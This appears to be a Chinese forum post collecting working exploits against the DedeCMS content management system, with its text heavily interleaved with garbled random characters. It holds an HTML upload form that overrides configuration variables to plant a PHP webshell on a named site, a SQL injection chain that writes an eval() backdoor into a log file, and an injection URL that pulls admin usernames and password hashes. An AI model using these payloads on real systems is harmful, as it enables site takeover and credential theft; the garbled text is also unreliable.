3 G% j9 E6 G" D' `) w: ]9 {
" R# L% x w( e* {3 V
) V4 L5 Y3 e5 X1 R) v) _6 ~/ F9 M, U9 g0 N; c" j. ^' j# G
J* ?( X' g6 f- W" l& G* L3 w
3 l0 }5 N9 A' ?" _& T6 S/ B* d织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
8 a; T8 Q3 T! F<html>. d+ \, N P9 ]4 L4 }
<head>
. q/ t" w; I- A- h/ D$ U0 q<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>4 h2 l- u; s7 N2 p2 y7 z. r
</head>
6 k+ F! D: i& `& G# Y! G<body style="FONT-SIZE: 9pt">, x7 s3 H0 v9 n, l' y
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br /># x$ s8 u( U6 i$ L5 R4 |" s8 q
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
0 L! B) v. b2 ?% c' p<input type='hidden' name='activepath' value='/data/cache/' />
/ ?* f4 s6 l) ?1 f# h<input type='hidden' name='cfg_basedir' value='../../' />
2 z: L3 \! o8 K* l" Y! p9 I<input type='hidden' name='cfg_imgtype' value='php' />! ~1 [7 Z& t3 v
<input type='hidden' name='cfg_not_allowall' value='txt' />
8 ~6 _$ ?: n; V<input type='hidden' name='cfg_softtype' value='php' />9 m0 S/ G4 A d- E. \
<input type='hidden' name='cfg_mediatype' value='php' />: ?- ~5 q/ Q0 ^
<input type='hidden' name='f' value='form1.enclosure' />4 R7 t3 @# ]# d7 u/ A; M# X1 Q3 z8 E
<input type='hidden' name='job' value='upload' />
( ]) u( l _" b" [: @6 t) h( x. W<input type='hidden' name='newname' value='fly.php' />( y* _2 k5 j& [0 D, m
Select U Shell <input type='file' name='uploadfile' size='25' />7 t ]- r# w( i3 S: Q1 I
<input type='submit' name='sb1' value='确定' />8 q: y: b7 s8 \
</form>
& w! S$ Z; R# K' T/ U: v<br />It's just a exp for the bug of Dedecms V55...<br />
/ f2 Z( w1 k5 M% N1 T' ~Need register_globals = on...<br />
5 m6 E4 Q) i& O8 P5 dFun the game,get a webshell at /data/cache/fly.php...<br />
# V' @4 u% o) k. L5 f1 G</body>
- P1 G8 w# v. {7 ?$ r</html>
. C2 b) D% y8 a) d2 v9 ^8 f! \6 S& ]1 a
5 F9 g3 `6 ~. @7 R1 N8 c
4 i" K9 E% z' Y" O; S1 k4 G; M$ V$ ?8 X0 T, \; j
/ A8 e' b! u" w1 @& H! f4 A
: g5 u& l2 y, H# d
% J: C3 z5 Z+ \* f; N" Q
- ?6 ^6 n0 c! A# k
, S U3 g2 J: _. C1 W% Q
8 t4 u8 M% Z" Z7 Q织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
( f5 ~+ {& B$ X9 U7 x$ @利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。 O7 ^: f, _# \8 G3 o- l+ |
1. 访问网址:
! |+ M9 d! m3 K9 g* i# Fhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
" F' {3 d$ o& P: x% k# i" [可看见错误信息
$ c* y1 x/ U& D( G- r& U6 B; L' k5 `7 `) c
N! H7 G, F9 Q- l9 |. S- `2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。+ P4 j l* U0 J7 `, R) ?) u
int(3) Error: Illegal double '1024e1024' value found during parsing6 s. d' d( E* x1 P' r7 M
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
4 P% q' c' s8 R
$ g1 [ E. e- \0 n' d) ^+ R4 n
% j, i K. J/ z( A( n1 h$ {9 f3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是2 z( y B. }- D6 ^+ M
7 r' D+ \" A/ w! p7 Z2 n& ?+ W1 x/ Q% ^
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>0 d! c" ]/ v) p/ h
7 V0 ?( C; K9 y4 L; X3 [; h' Y- W$ F' W
按确定后的看到第2步骤的信息表示文件木马上传成功.
! H" H, j" U; W% H, a
a& e! |7 f" [2 r5 z+ e7 K6 J) t% w
8 d5 z9 v* g% p8 k7 S$ T, @
, n* \* \, \. N9 z% f
& a4 |' o1 r5 C7 ?
: S+ S: @1 x9 U0 U9 F0 v( U
& C% Q6 t* K/ h9 O: |
! [% B8 I% p8 n. G; N8 e6 l! ^8 i6 k7 v
& Z% k: `8 n6 n, p" m% o l2 v! E& S4 }
& A+ Q/ b6 {2 f9 ?% W2 {
* L9 Q: S9 j1 F7 l' C- u$ m5 B
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
/ F1 O+ g' b/ l$ l- \ [% whttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对